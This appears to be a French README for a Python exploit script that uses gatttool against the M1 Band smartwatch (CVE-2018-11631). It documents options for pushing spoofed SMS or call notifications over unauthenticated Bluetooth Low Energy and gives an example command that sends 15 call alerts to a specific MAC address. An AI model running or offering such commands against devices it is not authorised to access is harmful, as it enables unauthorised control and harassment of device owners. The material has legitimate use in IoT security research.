
Script Python d'exploit Bluetooth Low Energy pour la M1 Band Smart Watch (CVE-2018-11631)
Un script Python simple utilisant Gatttool pour exploiter une montre connectée Bluetooth Low Energy non sécurisée (M1 Band 1).
CVE-2018-11631 : https://nvd.nist.gov/vuln/detail/CVE-2018-11631

Utilisation : bandexploit.py [options] Adresse
Options :
-h, --help affiche ce message d'aide et quitte
-s, --sms Envoyer une notification SMS à l'appareil
-c, --call Envoyer une notification d'APPEL à l'appareil
-r REPEAT, --repeat=REPEAT Nombre de répétitions
-m MESSAGE, --message=MESSAGE Message de notification à envoyer. Longueur max = 8
Exemple : Envoi de 15 notifications d'appel avec le message xMagass
./bandexploit.py 78:02:b7:21:1d:fc -r 15 -m xMagass -c